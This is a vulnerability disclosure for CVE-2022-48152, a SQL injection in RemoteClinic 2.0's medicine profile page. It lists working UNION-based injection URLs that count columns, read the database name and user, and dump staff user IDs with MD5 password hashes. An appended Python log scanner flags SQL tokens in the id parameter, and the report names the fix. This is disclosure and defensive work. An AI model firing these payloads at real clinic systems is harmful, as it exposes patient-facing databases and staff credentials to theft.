CVE-2022-48152: SQL Injection in /medicines/profile.php via `id` parameter · Issue #20 · remoteclinic/RemoteClinic

SQL Injection vulnerability in RemoteClinic 2.0 allows attackers to execute arbitrary commands and gain sensitive information via the id parameter to /medicines/profile.php.


Vulnerability Description:

SQL injection (SQLi) refers to an injection attack wherein an attacker can execute malicious SQL statements that control a web application’s database server.

Vulnerable Endpoint: http://localhost/RemoteClinic/medicines/profile.php?id=30 (the medicine profile ID used here is 30)

Steps to Reproduce:

  1. Log in to the application as a doctor.

  2. Click on Directory.

  3. Click on any medicine profile.

  4. Now put a single quote in the `id` parameter of the medicine profile endpoint.

  5. Balance the query to remove the errors.

    Full URL: http://localhost/RemoteClinic/medicines/profile.php?id=30%27--%20-

  6. Find the total number of columns.

    Full URL: http://localhost/RemoteClinic/medicines/profile.php?id=30%27%20order%20by%207--%20-

  7. Find the vulnerable columns.

    Full URL: http://localhost/RemoteClinic/medicines/profile.php?id=-30%27%20union%20select%201,2,3,4,5,6,7--%20-

  8. Now extract the current database and current user.

    Full URL: http://localhost/RemoteClinic/medicines/profile.php?id=-30%27%20union%20select%20database(),user(),3,4,5,6,7--%20-

  9. Extract all users and passwords (MD5 hashes).

    Full URL: http://localhost/RemoteClinic/medicines/profile.php?id=-30%27%20union%20select%20group_concat(userid,0x3a,passkey,0x0a),2,3,4,5,6,7%20from%20p_staff_dir--%20-
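Detection logic for this bug pattern, added here as an example and not taken from the report or the RemoteClinic project: it parses Apache-style access-log lines, percent-decodes the `id` parameter of requests to /medicines/profile.php, and flags any value that is not a plain integer, naming the reason. The log lines are constructed, and the assumption that a valid profile `id` is always an integer is mine.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Constructed sample access-log lines (not real RemoteClinic traffic); the second
# and third reuse the percent-encoded request shapes shown in the report above.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /RemoteClinic/medicines/profile.php?id=30 HTTP/1.1" 200 512
10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /RemoteClinic/medicines/profile.php?id=30%27--%20- HTTP/1.1" 200 498
10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /RemoteClinic/medicines/profile.php?id=-30%27%20union%20select%20database(),user(),3,4,5,6,7--%20- HTTP/1.1" 200 733
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /RemoteClinic/index.php HTTP/1.1" 200 1024
"""

# Common log format: client ip, ident, user, [timestamp], "METHOD target PROTO", status
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Tokens that have no business in a numeric id: SQL keywords, comment openers, quotes
SQLI_RE = re.compile(r"\b(union|select|order\s+by|group_concat)\b|--|/\*|'", re.IGNORECASE)


def id_is_clean(value: str) -> bool:
    """Assumption: profile ids are unsigned integers; anything else is out of spec."""
    return re.fullmatch(r"\d+", value) is not None


def inspect_line(line: str):
    """Return (ip, decoded_id, reason) for a suspicious profile.php request, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if not parts.path.endswith("/medicines/profile.php"):
        return None
    # parse_qs percent-decodes once; decode again to catch double-encoded payloads
    for raw in parse_qs(parts.query, keep_blank_values=True).get("id", []):
        decoded = unquote_plus(raw)
        if id_is_clean(decoded):
            continue
        reason = "sql tokens" if SQLI_RE.search(decoded) else "non-integer id"
        return (m.group("ip"), decoded, reason)
    return None


def find_suspicious(log_text: str):
    """Run inspect_line over every line and keep the hits, in log order."""
    return [hit for hit in (inspect_line(l) for l in log_text.splitlines()) if hit]


if __name__ == "__main__":
    for ip, value, reason in find_suspicious(SAMPLE_LOG):
        print(f"{ip}\t{reason}\t{value!r}")
```

The same integer-only check, applied server-side before the value reaches the query (or a prepared statement with a bound integer parameter), is the fix; the log check only tells you whether someone has already tried.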

Impact:

An attacker can use SQL injection to bypass a web application’s authentication and authorization mechanisms and retrieve the contents of an entire database. SQLi can also be used to add, modify and delete records in a database, affecting data integrity. Under the right circumstances, SQLi can also be used by an attacker to execute OS commands, which may then be used to escalate an attack even further.
